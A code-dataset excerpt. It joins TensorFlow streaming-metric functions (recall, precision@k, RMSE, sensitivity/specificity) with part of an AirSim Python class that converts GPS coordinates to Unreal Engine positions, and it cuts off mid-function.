labels = _maybe_expand_labels(labels, predictions)
_, top_k_idx = nn.top_k(predictions, k)
top_k_idx = math_ops.to_int64(top_k_idx)
tp, tp_update = _streaming_sparse_true_positive_at_k(
predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
weights=weights)
fn, fn_update = _streaming_sparse_false_negative_at_k(
predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
weights=weights)
metric = math_ops.div(tp, math_ops.add(tp, fn), name=scope)
update = math_ops.div(
tp_update, math_ops.add(tp_update, fn_update), name='update')
if metrics_collections:
ops.add_to_collections(metrics_collections, metric)
if updates_collections:
ops.add_to_collections(updates_collections, update)
return metric, update
def recall_at_thresholds(labels, predictions, thresholds,
weights=None, metrics_collections=None,
updates_collections=None, name=None):
"""Computes various recall values for different `thresholds` on `predictions`.
The `recall_at_thresholds` function creates four local variables,
`true_positives`, `true_negatives`, `false_positives` and `false_negatives`
for various values of thresholds. `recall[i]` is defined as the total weight
of values in `predictions` above `thresholds[i]` whose corresponding entry in
`labels` is `True`, divided by the total weight of `True` values in `labels`
(`true_positives[i] / (true_positives[i] + false_negatives[i])`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `recall`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `bool` `Tensor` whose shape matches `predictions`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `recall` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
recall: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables that
are used in the computation of `recall`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(name, 'recall_at_thresholds',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights, includes=('tp', 'fn'))
tp = values['tp']
fn = values['fn']
# Avoid division by zero.
epsilon = 1e-7
def compute_recall(name):
return math_ops.div(tp, epsilon + tp + fn, name='recall_' + name)
rec = compute_recall('value')
with ops.control_dependencies(update_ops.values()):
update_op = compute_recall('update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, rec)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return rec, update_op
def root_mean_squared_error(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the root mean squared error between the labels and predictions.
The `root_mean_squared_error` function creates two local variables,
`total` and `count` that are used to compute the root mean squared error.
This average is weighted by `weights`, and it is ultimately returned as
`root_mean_squared_error`: an idempotent operation that takes the square root
of the division of `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`root_mean_squared_error`. Internally, a `squared_error` operation computes
the element-wise square of the difference between `predictions` and `labels`.
Then `update_op` increments `total` with the reduced sum of the product of
`weights` and `squared_error`, and it increments `count` with the reduced sum
of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`root_mean_squared_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
root_mean_squared_error: A `Tensor` representing the current mean, the value
of `total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `root_mean_squared_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
value_tensor, update_op = mean_squared_error(
labels, predictions, weights, None, None,
name or 'root_mean_squared_error')
rmse = math_ops.sqrt(value_tensor)
with ops.control_dependencies([update_op]):
update_op = math_ops.sqrt(update_op)
if metrics_collections:
ops.add_to_collections(metrics_collections, rmse)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return rmse, update_op
def sensitivity_at_specificity(
labels, predictions, specificity, weights=None, num_thresholds=200,
metrics_collections=None, updates_collections=None, name=None):
"""Computes the specificity at a given sensitivity.
The `sensitivity_at_specificity` function creates four local
variables, `true_positives`, `true_negatives`, `false_positives` and
`false_negatives` that are used to compute the sensitivity at the given
specificity value. The threshold for the given specificity value is computed
and used to evaluate the corresponding sensitivity.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`sensitivity`. `update_op` increments the `true_positives`, `true_negatives`,
`false_positives` and `false_negatives` counts with the weight of each case
found in the `predictions` and `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
For additional information about specificity and sensitivity, see the
following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity
Args:
labels: A `bool` `Tensor` whose shape matches `predictions`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
specificity: A scalar value in range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use for matching the given
specificity.
metrics_collections: An optional list of collections that `sensitivity`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
sensitivity: A scalar `Tensor` representing the sensitivity at the given
`specificity` value.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `sensitivity`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`specificity` is not between 0 and 1, or if either `metrics_collections`
or `updates_collections` are not a list or tuple.
"""
if specificity < 0 or specificity > 1:
raise ValueError('`specificity` must be in the range [0, 1].')
with variable_scope.variable_scope(name, 'sensitivity_at_specificity',
(predictions, labels, weights)):
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
for i in range(num_thresholds-2)]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
tp = values['tp']
fn = values['fn']
tn = values['tn']
fp = values['fp']
def compute_sensitivity_at_specificity(name):
specificities = math_ops.div(tn, tn + fp + kepsilon)
tf_index = math_ops.argmin(math_ops.abs(specificities - specificity), 0)
tf_index = math_ops.cast(tf_index, dtypes.int32)
# Now, we have the implicit threshold, so compute the sensitivity:
return math_ops.div(tp[tf_index],
tp[tf_index] + fn[tf_index] + kepsilon,
name)
sensitivity = compute_sensitivity_at_specificity('value')
with ops.control_dependencies(update_ops.values()):
update_op = compute_sensitivity_at_specificity('update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, sensitivity)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return sensitivity, update_op
def _expand_and_tile(tensor, multiple, dim=0, name=None):
"""Slice `tensor` shape in 2, then tile along the sliced dimension.
A new dimension is inserted in shape of `tensor` before `dim`, then values are
tiled `multiple` times along the new dimension.
Args:
tensor: Input `Tensor` or `SparseTensor`.
multiple: Integer, number of times to tile.
dim: Integer, dimension along which to tile.
name: Name of operation.
Returns:
`Tensor` result of expanding and tiling `tensor`.
Raises:
ValueError: if `multiple` is less than 1, or `dim` is not in
`[-rank(tensor), rank(tensor)]`.
"""
if multiple < 1:
raise ValueError('Invalid multiple %s, must be > 0.' % multiple)
with ops.name_scope(
name, 'expand_and_tile', (tensor, multiple, dim)) as scope:
# Sparse.
tensor = sparse_tensor.convert_to_tensor_or_sparse_tensor(tensor)
if isinstance(tensor, sparse_tensor.SparseTensor):
if dim < 0:
expand_dims = array_ops.reshape(
array_ops.size(tensor.dense_shape) + dim, [1])
else:
expand_dims = [dim]
expanded_shape = array_ops.concat_v2(
(array_ops.slice(tensor.dense_shape, [0], expand_dims), [1],
array_ops.slice(tensor.dense_shape, expand_dims, [-1])),
0,
name='expanded_shape')
expanded = sparse_ops.sparse_reshape(
tensor, shape=expanded_shape, name='expand')
if multiple == 1:
return expanded
return sparse_ops.sparse_concat(
dim - 1 if dim < 0 else dim, [expanded] * multiple, name=scope)
# Dense.
expanded = array_ops.expand_dims(
tensor, dim if (dim >= 0) else (dim - 1), name='expand')
if multiple == 1:
return expanded
ones = array_ops.ones_like(array_ops.shape(tensor))
tile_multiples = array_ops.concat_v2(
(ones[:dim], (multiple,), ones[dim:]), 0, name='multiples')
return array_ops.tile(expanded, tile_multiples, name=scope)
def _num_relevant(labels, k):
"""Computes number of relevant values for each row in labels.
For labels with shape [D1, ... DN, num_labels], this is the minimum of
`num_labels` and `k`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels].
k: Integer, k for @k metric.
Returns:
Integer `Tensor` of shape [D1, ... DN], where each value is the number of
relevant values for that row.
Raises:
ValueError: if inputs have invalid dtypes or values.
"""
if k < 1:
raise ValueError('Invalid k=%s.' % k)
with ops.name_scope(None, 'num_relevant', (labels,)) as scope:
# For SparseTensor, calculate separate count for each row.
labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
if isinstance(labels, sparse_tensor.SparseTensor):
return math_ops.minimum(sets.set_size(labels), k, name=scope)
# For dense Tensor, calculate scalar count based on last dimension, and
# tile across labels shape.
labels_shape = array_ops.shape(labels)
labels_size = labels_shape[-1]
num_relevant_scalar = math_ops.minimum(labels_size, k)
return array_ops.fill(labels_shape[0:-1], num_relevant_scalar, name=scope)
def _sparse_average_precision_at_k(labels, predictions, k):
"""Computes average precision@k of predictions with respect to sparse labels.
From en.wikipedia.org/wiki/Information_retrieval#Average_precision, formula
for each row is:
AveP = sum_{i=1...k} P_{i} * rel_{i} / num_relevant_items
A "row" is the elements in dimension [D1, ... DN] of `predictions`, `labels`,
and the result `Tensors`. In the common case, this is [batch_size]. Each row
of the results contains the average precision for that row.
Internally, a `top_k` operation computes a `Tensor` indicating the top `k`
`predictions`. Set operations applied to `top_k` and `labels` calculate the
true positives, which are used to calculate the precision ("P_{i}" term,
above).
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and `predictions` has shape
[batch size, num_classes]. The final dimension contains the logit values
for each class. [D1, ... DN] must match `labels`.
k: Integer, k for @k metric. This will calculate an average precision for
range `[1,k]`, as documented above.
Returns:
`float64` `Tensor` of shape [D1, ... DN], where each value is the average
precision for that row.
Raises:
ValueError: if k is invalid.
"""
if k < 1:
raise ValueError('Invalid k=%s.' % k)
with ops.name_scope(
None, 'average_precision', (predictions, labels, k)) as scope:
labels = _maybe_expand_labels(labels, predictions)
# Calculate top k indices to produce [D1, ... DN, k] tensor.
_, predictions_idx = nn.top_k(predictions, k)
predictions_idx = math_ops.to_int64(predictions_idx, name='predictions_idx')
# Expand dims to produce [D1, ... DN, k, 1] tensor. This gives us a separate
# prediction for each k, so we can calculate separate true positive values
# for each k.
predictions_idx_per_k = array_ops.expand_dims(
predictions_idx, -1, name='predictions_idx_per_k')
# Replicate labels k times to produce [D1, ... DN, k, num_labels] tensor.
labels_per_k = _expand_and_tile(
labels, multiple=k, dim=-1, name='labels_per_k')
# The following tensors are all of shape [D1, ... DN, k], containing values
# per row, per k value.
# `relevant_per_k` (int32) - Relevance indicator, 1 if the prediction at
# that k value is correct, 0 otherwise. This is the "rel_{i}" term from
# the formula above.
# `tp_per_k` (int32) - True positive counts.
# `retrieved_per_k` (int32) - Number of predicted values at each k. This is
# the precision denominator.
# `precision_per_k` (float64) - Precision at each k. This is the "P_{i}"
# term from the formula above.
# `relevant_precision_per_k` (float64) - Relevant precisions; i.e.,
# precisions at all k for which relevance indicator is true.
relevant_per_k = _sparse_true_positive_at_k(
labels_per_k, predictions_idx_per_k, name='relevant_per_k')
tp_per_k = math_ops.cumsum(relevant_per_k, axis=-1, name='tp_per_k')
retrieved_per_k = math_ops.cumsum(
array_ops.ones_like(relevant_per_k), axis=-1, name='retrieved_per_k')
precision_per_k = math_ops.div(
math_ops.to_double(tp_per_k), math_ops.to_double(retrieved_per_k),
name='precision_per_k')
relevant_precision_per_k = math_ops.multiply(
precision_per_k, math_ops.to_double(relevant_per_k),
name='relevant_precision_per_k')
# Reduce along k dimension to get the sum, yielding a [D1, ... DN] tensor.
precision_sum = math_ops.reduce_sum(
relevant_precision_per_k, reduction_indices=(-1,), name='precision_sum')
# Divide by number of relevant items to get average precision. These are
# the "num_relevant_items" and "AveP" terms from the formula above.
num_relevant_items = math_ops.to_double(_num_relevant(labels, k))
return math_ops.div(precision_sum, num_relevant_items, name=scope)
def sparse_average_precision_at_k(labels,
predictions,
k,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes average precision@k of predictions with respect to sparse labels.
`sparse_average_precision_at_k` creates two local variables,
`average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
are used to compute the frequency. This frequency is ultimately returned as
`average_precision_at_<k>`: an idempotent operation that simply divides
`average_precision_at_<k>/total` by `average_precision_at_<k>/max`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false positives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_positive_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and `predictions` has shape
[batch size, num_classes]. The final dimension contains the logit values
for each class. [D1, ... DN] must match `labels`.
k: Integer, k for @k metric. This will calculate an average precision for
range `[1,k]`, as documented above.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
mean_average_precision: Scalar `float64` `Tensor` with the mean average
precision values.
update: `Operation` that increments variables appropriately, and whose
value matches `metric`.
"""
with ops.name_scope(
name, _at_k_name('average_precision', k),
(predictions, labels, weights)) as scope:
# Calculate per-example average precision, and apply weights.
average_precision = _sparse_average_precision_at_k(
predictions=predictions, labels=labels, k=k)
if weights is not None:
weights = _broadcast_weights(
math_ops.to_double(weights), average_precision)
average_precision = math_ops.multiply(average_precision, weights)
# Create accumulation variables and update ops for max average precision and
# total average precision.
with ops.name_scope(None, 'max', (average_precision,)) as max_scope:
# `max` is the max possible precision. Since max for any row is 1.0:
# - For the unweighted case, this is just the number of rows.
# - For the weighted case, it's the sum of the weights broadcast across
# `average_precision` rows.
max_var = _local_variable(
array_ops.zeros([], dtype=dtypes.float64), name=max_scope)
if weights is None:
batch_max = math_ops.to_double(
array_ops.size(average_precision, name='batch_max'))
else:
batch_max = math_ops.reduce_sum(weights, name='batch_max')
max_update = state_ops.assign_add(max_var, batch_max, name='update')
with ops.name_scope(None, 'total', (average_precision,)) as total_scope:
total_var = _local_variable(
array_ops.zeros([], dtype=dtypes.float64), name=total_scope)
batch_total = math_ops.reduce_sum(average_precision, name='batch_total')
total_update = state_ops.assign_add(total_var, batch_total, name='update')
# Divide total by max to get mean, for both vars and the update ops.
mean_average_precision = _safe_scalar_div(total_var, max_var, name='mean')
update = _safe_scalar_div(total_update, max_update, name=scope)
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_average_precision)
if updates_collections:
ops.add_to_collections(updates_collections, update)
return mean_average_precision, update
def _sparse_false_positive_at_k(labels,
predictions_idx,
class_id=None,
weights=None):
"""Calculates false positives for precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
Returns:
A [D1, ... DN] `Tensor` of false positive counts.
"""
with ops.name_scope(
None, 'false_positives', (predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(labels,
predictions_idx,
class_id)
fp = sets.set_size(sets.set_difference(
predictions_idx, labels, aminusb=True))
fp = math_ops.to_double(fp)
if weights is not None:
with ops.control_dependencies((_assert_weights_rank(weights, fp),)):
weights = math_ops.to_double(weights)
fp = math_ops.mul(fp, weights)
return fp
def _streaming_sparse_false_positive_at_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step false positives for precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incomptable shape.
"""
with ops.name_scope(
name, _at_k_name('false_positive', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
fp = _sparse_false_positive_at_k(
predictions_idx=predictions_idx, labels=labels, class_id=class_id,
weights=weights)
batch_total_fp = math_ops.to_double(math_ops.reduce_sum(fp))
var = _local_variable(array_ops.zeros([], dtype=dtypes.float64), name=scope)
return var, state_ops.assign_add(var, batch_total_fp, name='update')
def sparse_precision_at_k(labels,
predictions,
k,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes precision@k of the predictions with respect to sparse labels.
If `class_id` is specified, we calculate precision by considering only the
entries in the batch for which `class_id` is in the top-k highest
`predictions`, and computing the fraction of them for which `class_id` is
indeed a correct label.
If `class_id` is not specified, we'll calculate precision as how often on
average a class among the top-k classes with the highest predicted values
of a batch entry is correct and can be found in the label for that entry.
`sparse_precision_at_k` creates two local variables,
`true_positive_at_<k>` and `false_positive_at_<k>`, that are used to compute
the precision@k frequency. This frequency is ultimately returned as
`precision_at_<k>`: an idempotent operation that simply divides
`true_positive_at_<k>` by total (`true_positive_at_<k>` +
`false_positive_at_<k>`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false positives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_positive_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and predictions has shape [batch size, num_classes].
The final dimension contains the logit values for each class. [D1, ... DN]
must match `labels`.
k: Integer, k for @k metric.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes], where num_classes is the last dimension of
`predictions`. If `class_id` is outside this range, the method returns
NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
precision: Scalar `float64` `Tensor` with the value of `true_positives`
divided by the sum of `true_positives` and `false_positives`.
update_op: `Operation` that increments `true_positives` and
`false_positives` variables appropriately, and whose value matches
`precision`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
"""
with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
(predictions, labels, weights)) as scope:
labels = _maybe_expand_labels(labels, predictions)
_, top_k_idx = nn.top_k(predictions, k)
top_k_idx = math_ops.to_int64(top_k_idx)
tp, tp_update = _streaming_sparse_true_positive_at_k(
predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
weights=weights)
fp, fp_update = _streaming_sparse_false_positive_at_k(
predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
weights=weights)
metric = math_ops.div(tp, math_ops.add(tp, fp), name=scope)
update = math_ops.div(
tp_update, math_ops.add(tp_update, fp_update), name='update')
if metrics_collections:
ops.add_to_collections(metrics_collections, metric)
if updates_collections:
ops.add_to_collections(updates_collections, update)
return metric, update
def specificity_at_sensitivity(
labels, predictions, sensitivity, weights=None, num_thresholds=200,
metrics_collections=None, updates_collections=None, name=None):
"""Computes the specificity at a given sensitivity.
The `specificity_at_sensitivity` function creates four local
variables, `true_positives`, `true_negatives`, `false_positives` and
`false_negatives` that are used to compute the specificity at the given
sensitivity value. The threshold for the given sensitivity value is computed
and used to evaluate the corresponding specificity.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`specificity`. `update_op` increments the `true_positives`, `true_negatives`,
`false_positives` and `false_negatives` counts with the weight of each case
found in the `predictions` and `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
For additional information about specificity and sensitivity, see the
following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity
Args:
labels: A `bool` `Tensor` whose shape matches `predictions`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
sensitivity: A scalar value in range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use for matching the given
sensitivity.
metrics_collections: An optional list of collections that `specificity`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
specificity: A scalar `Tensor` representing the specificity at the given
`specificity` value.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `specificity`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`sensitivity` is not between 0 and 1, or if either `metrics_collections`
or `updates_collections` are not a list or tuple.
"""
if sensitivity < 0 or sensitivity > 1:
raise ValueError('`sensitivity` must be in the range [0, 1].')
with variable_scope.variable_scope(name, 'specificity_at_sensitivity',
(predictions, labels, weights)):
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
for i in range(num_thresholds-2)]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 - kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
tp = values['tp']
fn = values['fn']
tn = values['tn']
fp = values['fp']
def compute_specificity_at_sensitivity(name):
"""Computes the specificity at the given sensitivity.
Args:
name: The name of the operation.
Returns:
The specificity using the aggregated values.
"""
sensitivities = math_ops.div(tp, tp + fn + kepsilon)
# We'll need to use this trick until tf.argmax allows us to specify
# whether we should use the first or last index in case of ties.
min_val = math_ops.reduce_min(math_ops.abs(sensitivities - sensitivity))
indices_at_minval = math_ops.equal(
math_ops.abs(sensitivities - sensitivity), min_val)
indices_at_minval = math_ops.to_int64(indices_at_minval)
indices_at_minval = math_ops.cumsum(indices_at_minval)
tf_index = math_ops.argmax(indices_at_minval, 0)
tf_index = math_ops.cast(tf_index, dtypes.int32)
# Now, we have the implicit threshold, so compute the specificity:
return math_ops.div(tn[tf_index],
tn[tf_index] + fp[tf_index] + kepsilon,
name)
specificity = compute_specificity_at_sensitivity('value')
with ops.control_dependencies(update_ops.values()):
update_op = compute_specificity_at_sensitivity('update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, specificity)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return specificity, update_op
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
27edb3c2d5067d1fa5b50a92d11a5ec4f2897708 | 7eda6c45c967d3e256ac04b2acd3da401c181aa4 | /PythonCode/Routing/AirSimPythonClient/GPS/GPSToUnreal.py | a8b358368c162561074d8c9c752a5bcc1eb0c666 | [
"MIT"
] | permissive | CryptArc/CBRNeVirtualEnvironment | 419d11fe1672c4302b38fe57f735b924aaa2e6e8 | b3128a5a084b7eca3ff403812646e6db615b93ce | refs/heads/master | 2020-03-31T11:08:45.313174 | 2018-10-03T12:36:51 | 2018-10-03T12:36:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,103 | py | import sys
sys.path.append('..')
from .GPSCoordinate import GPSCoordinate
class GPSToUnreal:
# this is taken as origin (0,0)
# EYRE_SQUARE_COORD = GPSCoordinate(53.2745, -9.049, 0)
# NUIG
# EYRE_SQUARE_COORD = GPSCoordinate(53.276, -9.057, 0)
# not quite eyre square, but close enough!
#HOME_COORD = GPSCoordinate(53.280, -9.062, 0)
ORIGIN_GPS = GPSCoordinate(47.641468, -122.140165, 122)
# transormation that maps a GPS position from the microsoft office origin
# to the Eyre square coordinate
#DELTA_TRANSFORM = HOME_COORD - ORIGIN_GPS
# home_position_GPS is the home gps location of the drone in AirSim
# (close to microsoft headquarters)
def __init__(self, home_position_GPS: GPSCoordinate = GPSCoordinate(53.2793, -9.0638)):
'''Set the home gps coordinate of the rav'''
self.home_position_GPS = home_position_GPS
#self.home_position_GPS = GPSCoordinate(53.280, -9.062, 0)
#print('calculated GPS Delta transform as: {}'.format(GPSToUnreal.DELTA_TRANSFORM))
# set home position reference
#print('Set home position of the RAV as: {}'.format(self.home_position_GPS))
#self.home_position_GPS_Rel = home_position_GPS + GPSToUnreal.DELTA_TRANSFORM
#print('Set home position relative to RAV as: {}'.format(self.home_position_GPS_Rel))
# this gets the delta from the origin to home_position
# self.home_position_GPS_origin_delta = GPSToUnreal.EYRE_SQUARE_COORD - GPSToUnreal.ORIGIN_GPS
def getMoveToPosXYZFromGPSCoord(self, desired_GPS_position):
'''Returns the XYZ Unreal Engine NED coordinatee position to move to in order to reach the desired gps position'''
metres_lat = self.home_position_GPS.get_lat_metres_to_other(desired_GPS_position)
metres_long = self.home_position_GPS.get_long_metres_to_other(desired_GPS_position)
metres_alt = self.home_position_GPS.get_alt_metres_to_other(desired_GPS_position)
#check whether the lat/long difference is positive or negative (metres to other methods give abs values)
if desired_GPS_position.lat < self.home_position_GPS.lat:
metres_lat =- metres_lat
if desired_GPS_position.long < self.home_position_GPS.long:
metres_long =- metres_long
return (metres_lat, metres_long, -abs(metres_alt))
#@staticmethod
#def geoPoint_to_GPSCoordinate(geoPoint):
# return GPSCoordinate(geoPoint.latitude, geoPoint.longitude, geoPoint.altitude)
def get_GPS_Pos(self, microsoft_relative_GPS_pos: GPSCoordinate):
'''AirSim calculates GPS position in relation to microsoft headquarters,
this gives the GPS position relative to the home coordinate set by the constructor.'''
#calculate lat, long distance from current position to microsoft home coordinate
if not isinstance(microsoft_relative_GPS_pos, GPSCoordinate):
